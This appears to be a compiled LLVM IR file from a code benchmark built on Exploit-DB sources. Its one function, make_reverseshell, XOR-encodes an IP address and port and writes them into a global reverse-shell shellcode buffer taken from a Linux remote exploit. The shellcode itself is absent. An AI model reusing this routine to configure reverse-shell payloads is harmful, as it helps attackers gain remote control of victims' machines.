; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_915.c_make_reverseshell.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_915.c_make_reverseshell.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@reverse_sc = common dso_local global i32* null, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @make_reverseshell(i8* %0, i8* %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8*, align 8
  %5 = alloca i8*, align 8
  %6 = alloca i64, align 8
  %7 = alloca i16, align 2
  store i8* %0, i8** %4, align 8
  store i8* %1, i8** %5, align 8
  %8 = load i8*, i8** %4, align 8
  %9 = call i64 @inet_addr(i8* %8)
  %10 = xor i64 %9, 2576980377
  store i64 %10, i64* %6, align 8
  %11 = load i8*, i8** %5, align 8
  %12 = call zeroext i16 @atoi(i8* %11)
  %13 = zext i16 %12 to i32
  %14 = xor i32 %13, 39321
  %15 = trunc i32 %14 to i16
  %16 = call zeroext i16 @htons(i16 zeroext %15)
  store i16 %16, i16* %7, align 2
  %17 = load i32*, i32** @reverse_sc, align 8
  %18 = getelementptr inbounds i32, i32* %17, i64 111
  %19 = call i32 (i32*, ...) @memcpy(i32* %18, i64* %6, i32 4)
  %20 = load i32*, i32** @reverse_sc, align 8
  %21 = getelementptr inbounds i32, i32* %20, i64 118
  %22 = call i32 (i32*, ...) @memcpy(i32* %21, i16* %7, i32 2)
  %23 = load i32, i32* %3, align 4
  ret i32 %23
}

declare dso_local i64 @inet_addr(i8*) #1

declare dso_local zeroext i16 @htons(i16 zeroext) #1

declare dso_local zeroext i16 @atoi(i8*) #1

declare dso_local i32 @memcpy(i32*, ...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
